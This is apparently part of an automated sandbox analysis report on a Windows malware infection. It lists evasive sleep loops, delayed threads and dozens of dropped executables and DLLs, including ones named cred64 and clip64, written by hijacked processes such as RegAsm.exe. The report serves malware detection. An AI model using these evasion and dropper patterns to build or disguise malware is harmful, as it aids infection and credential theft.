Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 570854
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 570174
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 569384
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 568678
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 291318
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Window / User API: threadDelayed 1173 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Window / User API: threadDelayed 1141 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Window / User API: threadDelayed 1144 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Window / User API: threadDelayed 1326 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window / User API: threadDelayed 944
Source: C:\Users\user\1000021002\ac861238af.exe Window / User API: threadDelayed 662
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Window / User API: threadDelayed 2567
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Window / User API: threadDelayed 2264
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Window / User API: threadDelayed 2236
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Window / User API: threadDelayed 2236
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Window / User API: threadDelayed 4717
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Window / User API: threadDelayed 4830
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 9256
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe Window / User API: threadDelayed 830
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Window / User API: threadDelayed 2276
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Window / User API: threadDelayed 2299
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Window / User API: threadDelayed 2268
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Window / User API: threadDelayed 2284
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 356
Found decision node followed by non-executed suspicious APIs
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
Found dropped PE file which has not been started or loaded
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\Pictures\X53t1QSznpDGsvX2qLbdQFD1.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Osh3JGbyB69u4I6NltayynfD.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\Pictures\gX4d2ArXDOHTjofk9CfRb7Jz.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\Pictures\5nFKWr1EKUheiDEHo671vxm8.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\clip64[1].dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\QbkKvIT5uJj3Cx8h0ECIsmUK.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u6po.0.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000234001\ISetup8.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\u6po.2\ASUS_WMI.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\install[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\gold[1].exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\Pictures\MtYY7PxoMVCDp1NJbYQga2LV.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\Pictures\jzMGE9Xb2Ny8jtCWlXWAk3ap.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\Pictures\de4IGlGSbV9c3J4m0qZtBGm8.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\9WrQ2c2u5fxH1pcvCwwjGhdd.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\aYtr3HT3BUqjK6QB6WYpwCcm.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\Pictures\zWIy5Pdf1kgq9YulaqIKrGGy.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\Pictures\JcuJCrKoIRAAJIb94uRnhVjr.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\gPQjkT7jjoMSIv7cXyWMW1C4.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Z0V3bHdPFsglc9f9uLbxOZFN.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\leqbtljZtxj2WxVvdmpHiNsI.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\9SmQs0R4T5RJUISklvcv02zp.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\Pictures\ppcQqLgPI8Dyy7YykX33fm5x.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\Pictures\S41vy8IsPU7Iudry37c4uNtg.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1000081001\install.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1000236001\4767d2e713f2021e8fe856e3ea638b58.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000234001\ISetup8.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\u6po.2\AsIO.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u6po.0.exe Dropped PE file which has not been started: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\sarra[1].exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\C893DEcM3dAA247WrHBz1SDW.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\CmCQsbfi77SnYQWckHTzUjRg.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\oqwWhViccQzmDvkS751EZRiG.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000234001\ISetup8.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\u6po.2\ATKEX.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\laQhqKepZhfkS5rQoYOvKJAy.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\Pictures\g81RdhkO8Pp47pz1l8siHWuN.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\Pictures\pScZMSZH0uu2OkUDvWpN2tuz.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\dmmb0z6yJ22pC75a4y49Nfob.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\mBoc1pbzy7gOQT20pyEZL3en.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\Pictures\STUD4CnDuvZtXsKBuBkO31id.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\jfesawdr[1].exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\Pictures\1NXbTL9dcUCk55eVv5KRJhmL.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\Pictures\oXA3lyE6zGyLyvw1CwVKpLsf.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\cred64[1].dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\iO9tAKw78L31Wsbvnq5kt5m1.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\Pictures\M4OBi0ywNcuUZRFLcfJ70nUH.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\Pictures\gmHwlMZnGawtAwStcAU6D1RM.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\8sXk5E4IG9n4ZHu2M9Littnp.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\NN7y6Ml4QHJBCfpeCmt1XQq3.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\f2NBhcBIObRGHagt6xPQoMa2.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\Pictures\gjVUxsTFUgOAjApkeCU52nGD.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\Pictures\rVg8HtIzXa4xhJHL7Pn8A6d2.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Bkg8NSHXvizTVBsjT3dzRvci.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\Pictures\0co9idnjzay1KSn3DMfCsBSw.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\ULDq5mjQ4b5aNI3V4eIJfMVS.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\Pictures\v6zcDFD3cRDhmr34kNKDn8tX.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\GIz2DLitsyoTn14REJti2nqN.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\evHtDP9yDvs3XYDQg8lqEVoH.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\Pictures\Jr1vIs8XqAmt0RT7bHMte8ts.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\Pictures\qPQ3lJ1fN9DRgfiXtyMpf1ll.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\gKIISy7hixfPFGDeeM7cQzit.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Aghrmi42Lz5QvS8u8U6BiVXQ.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\Pictures\SjGlviky3CjPwV1vWXl2gdhJ.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\Pictures\D7t23m0X26bEkZqkCQtNwK5Y.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\Pictures\s8YO7ScTlLADC9Vt6wr10aY4.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\Pictures\11xbcpylNeYY4tZ39QN34xGC.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1000079001\gold.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\iFyHzFXRkeOppMlu3FtGrLYy.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\Pictures\QcyIEuk7gD7wTlhElB94jgu9.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\Pictures\tAKreBGDuozTwXSZfhU7cFT3.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\PHoZl3WswCZ1lCRWCJPBFZtN.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\Pictures\pl49PSFkcWVTQqBe8TA2VhRW.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\Pictures\3N5jWnvXHqfYUsxTijnW3Uc5.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\alexxxxxxxx[1].exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\H3bqnZf96LFIOlogieo3h5K9.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\Pictures\7iI5SUAnqRGyB1YdSAO06W1v.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\4767d2e713f2021e8fe856e3ea638b58[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1000077001\jfesawdr.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\gzxs1MlpU5tnMfkC7kzgvR1h.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\i8dOWYOLtbNAxDJGOQ8Wt9el.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\5W1aDm1vpFLN4gyrIiISMc4h.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1000080001\alexxxxxxxx.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\Pictures\v3efLAgS1BVue6uNuzFECLaH.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\LIdx8BlqmZTW07MQOtXboF4f.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\5LzADXbR9e1baIzvWufsCa70.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\KHojJ9v7XtNSHZfW6gAnnH23.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\xF7m0A44x6KodDxbhAtiDsub.exe Jump to dropped file
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe TID: 6792 Thread sleep count: 1173 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe TID: 6792 Thread sleep time: -35190000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe TID: 6872 Thread sleep time: -180000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe TID: 1072 Thread sleep count: 52 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe TID: 1072 Thread sleep time: -104052s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe TID: 3804 Thread sleep count: 1141 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe TID: 3804 Thread sleep time: -2283141s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe TID: 5804 Thread sleep count: 66 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe TID: 2828 Thread sleep count: 1144 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe TID: 2828 Thread sleep time: -2289144s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe TID: 5804 Thread sleep count: 253 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe TID: 2756 Thread sleep count: 1326 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe TID: 2756 Thread sleep time: -2653326s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 7508 Thread sleep count: 76 > 30
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 7508 Thread sleep time: -152076s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 5600 Thread sleep count: 49 > 30
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 5600 Thread sleep time: -98049s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 5776 Thread sleep count: 944 > 30
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 5776 Thread sleep time: -28320000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 8068 Thread sleep count: 120 > 30
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 8068 Thread sleep time: -240120s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 8128 Thread sleep count: 111 > 30
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 8128 Thread sleep time: -222111s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 7916 Thread sleep count: 111 > 30
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 7916 Thread sleep time: -222111s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 5012 Thread sleep count: 108 > 30
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 5012 Thread sleep time: -216108s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 5100 Thread sleep count: 100 > 30
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 5100 Thread sleep time: -200100s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 8072 Thread sleep count: 112 > 30
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 8072 Thread sleep time: -224112s >= -30000s
Source: C:\Windows\SysWOW64\rundll32.exe TID: 8056 Thread sleep count: 33 > 30
Source: C:\Windows\SysWOW64\rundll32.exe TID: 8056 Thread sleep time: -33000s >= -30000s
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 8416 Thread sleep count: 37 > 30
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 8416 Thread sleep time: -74037s >= -30000s
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 8420 Thread sleep count: 40 > 30
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 8420 Thread sleep time: -80040s >= -30000s
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 8436 Thread sleep count: 2567 > 30
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 8436 Thread sleep time: -5136567s >= -30000s
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 8424 Thread sleep count: 2264 > 30
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 8424 Thread sleep time: -4530264s >= -30000s
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 5808 Thread sleep count: 163 > 30
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 5808 Thread sleep count: 119 > 30
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 8440 Thread sleep count: 36 > 30
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 8440 Thread sleep time: -72036s >= -30000s
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 8444 Thread sleep count: 35 > 30
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 8444 Thread sleep time: -70035s >= -30000s
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 8432 Thread sleep count: 2236 > 30
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 8432 Thread sleep time: -4474236s >= -30000s
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 8428 Thread sleep count: 2236 > 30
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 8428 Thread sleep time: -4474236s >= -30000s
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 8544 Thread sleep count: 47 > 30
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 8544 Thread sleep time: -94047s >= -30000s
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 8548 Thread sleep count: 56 > 30
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 8548 Thread sleep time: -112056s >= -30000s
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 8564 Thread sleep count: 4717 > 30
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 8564 Thread sleep time: -9438717s >= -30000s
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 8568 Thread sleep count: 53 > 30
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 8568 Thread sleep time: -106053s >= -30000s
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 5752 Thread sleep count: 39 > 30
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 8556 Thread sleep time: -56028s >= -30000s
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 8560 Thread sleep count: 4830 > 30
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 8560 Thread sleep time: -9664830s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2740 Thread sleep time: -180000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8516 Thread sleep time: -8301034833169293s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe TID: 3896 Thread sleep count: 830 > 30
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe TID: 3896 Thread sleep time: -24900000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe TID: 8268 Thread sleep time: -720000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe TID: 8344 Thread sleep count: 75 > 30
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe TID: 8344 Thread sleep time: -150075s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe TID: 8348 Thread sleep count: 69 > 30
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe TID: 8348 Thread sleep time: -138069s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe TID: 8332 Thread sleep count: 2276 > 30
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe TID: 8332 Thread sleep time: -4554276s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe TID: 8204 Thread sleep count: 210 > 30
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe TID: 8324 Thread sleep count: 2299 > 30
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe TID: 8324 Thread sleep time: -4600299s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe TID: 8320 Thread sleep count: 2268 > 30
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe TID: 8320 Thread sleep time: -4538268s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe TID: 8328 Thread sleep count: 2284 > 30
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe TID: 8328 Thread sleep time: -4570284s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe TID: 8336 Thread sleep count: 74 > 30
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe TID: 8336 Thread sleep time: -148074s >= -30000s
